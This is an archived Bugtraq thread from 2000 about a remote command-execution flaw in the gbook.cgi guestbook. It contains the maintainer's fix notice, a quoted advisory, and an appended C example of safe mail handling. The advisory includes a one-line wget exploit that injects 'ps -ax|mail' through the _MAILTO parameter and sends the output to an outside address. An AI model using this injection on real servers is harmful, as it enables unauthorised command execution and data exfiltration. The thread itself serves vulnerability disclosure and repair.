[17607] in bugtraq
Re: [hacksware] gbook.cgi remote command execution vulnerability
daemon@ATHENA.MIT.EDU (William Kendrick)
Sun Nov 12 14:08:23 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <200011120300.eAC30wg30450@sonic.net>
Date: Sat, 11 Nov 2000 19:00:58 -0800
Reply-To: William Kendrick <nbs@SONIC.NET>
From: William Kendrick <nbs@SONIC.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
So far as I can tell, it's fixed... Please let me know if anyone
sees any other glaring holes. It IS rather ancient software.
-bill!
Forwarded message:
> From mbrennen@fni.com Sat Nov 11 10:28:17 2000
> X-envelope-info: <mbrennen@fni.com>
> Date: Sat, 11 Nov 2000 12:30:28 -0600 (CST)
> From: Michael Brennen <mbrennen@fni.com>
> To: William Kendrick <nbs@sonic.net>
> Cc: mat@hacksware.com
> Subject: Re: [hacksware] gbook.cgi remote command execution vulnerability
> (fwd)
> In-Reply-To: <200011110920.eAB9KVL11974@sonic.net>
> Message-ID: <Pine.LNX.4.21.0011111230000.27066-100000@henry.fni.com>
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
>
>
> You might want to post this to bugtraq.
>
> -- Michael
>
>
> On Sat, 11 Nov 2000, William Kendrick wrote:
>
> > Should be fixed, thanks.
> >
> > I wonder why I wasn't informed directly! My @zippy.sonoma.edu address
> > _should_ still be getting forwarded to my new addr.
> >
> > New download available at:
> >
> > ftp://ftp.sonic.net/pub/users/nbs/unix/www/gbook/gbook.tar.gz
> >
> > Modification date: November 11, 2000.
> >
> > -bill!
> >
> > >
> > >
> > > Don't know if you saw this or not; you probably have by now. There
> > > are a couple of vulnerable sprintf() also that should be replaced by
> > > snprintf().
> > >
> > > -- Michael
> > >
> > >
> > > ---------- Forwarded message ----------
> > > Date: Fri, 10 Nov 2000 20:38:44 +0900
> > > From: JW Oh <mat@IVNTECH.COM>
> > > To: BUGTRAQ@SECURITYFOCUS.COM
> > > Subject: [hacksware] gbook.cgi remote command execution vulnerability
> > >
> > > Bug Report
> > >
> > > 1. Name: gbook.cgi remote command execution vulnerability
> > > 2. Release Date: 2000.11.10
> > > 3. Affected Application:
> > > GBook - A web site guestbook
> > > By Bill Kendrick
> > > kendrick@zippy.sonoma.edu
> > > http://zippy.sonoma.edu/kendrick/
> > > 4. Author: mat@hacksware.com
> > > 5. Type: Input validation Error
> > >
> > > 6. Explanation
> > > gbook.cgi is used by some web sites.
> > > We can set the _MAILTO parameter, and popen is called to execute the mail command.
> > > If ';' is used in the _MAILTO variable, you can execute an arbitrary command with it.
> > > It's so trivial. :)
> > > 7. Exploits
> > > This exploit executes "ps -ax" command and sends the result to haha@yaho.com.
> > >
> > > wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha@yaho.com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe@yaho.com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"
> > >
> > >
> > > =================================================
> > > | mat@hacksware.com |
> > > | http://hacksware.com |
> > > =================================================
> > >
> > >
> >
>
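The fix a maintainer would want for the _MAILTO flaw described above, as an added example in C that is not gbook's own code: an allow-list check on the recipient address, and a way to hand that address to the mail program through execlp() so no shell ever parses it. The program name "mail" and the helper names are assumptions for illustration.

```c
/* Added example (not gbook's code): validate a user-supplied recipient and
 * spawn the mailer without /bin/sh, so ';' or '|' in the value cannot become
 * a second command the way they do when the string is passed to popen(). */
#include <ctype.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Allow-list check: local@domain built only from letters, digits and a few
 * safe punctuation characters. Shell metacharacters (';', '|', '&', '`', '$',
 * quotes, whitespace) are rejected, and a leading '-' is rejected so the
 * address cannot be mistaken for a command-line option. Returns 1 if safe. */
int mailto_is_safe(const char *addr)
{
    size_t n = strlen(addr);
    const char *at;
    if (n == 0 || n > 254 || !isalnum((unsigned char)addr[0])) return 0;
    at = strchr(addr, '@');                 /* exactly one '@', not at either end */
    if (at == NULL || at[1] == '\0' || strchr(at + 1, '@') != NULL) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)addr[i];
        if (!(isalnum(c) || c == '@' || c == '.' || c == '-' || c == '_' || c == '+'))
            return 0;
    }
    return 1;
}

/* Feed body to "mail <addr>" on stdin. The recipient is a separate argv
 * element of execlp(), so there is no shell to reinterpret it. Returns 0 on
 * success, -1 if the address fails validation or the mailer cannot be run. */
int send_mail_nosh(const char *addr, const char *body)
{
    int fd[2], status;
    pid_t pid;
    if (!mailto_is_safe(addr) || pipe(fd) != 0) return -1;
    pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                         /* child: stdin <- pipe, exec mailer */
        dup2(fd[0], STDIN_FILENO);
        close(fd[0]); close(fd[1]);
        execlp("mail", "mail", addr, (char *)NULL);
        _exit(127);                         /* mailer not found: fail loudly */
    }
    close(fd[0]);
    if (write(fd[1], body, strlen(body)) < 0) { close(fd[1]); return -1; }
    close(fd[1]);
    if (waitpid(pid, &status, 0) != pid) return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}
```

The same pattern applies to the sprintf() calls Michael mentions: bound the copy with snprintf() and check its return value against the buffer size, since a truncated address should be rejected, not sent.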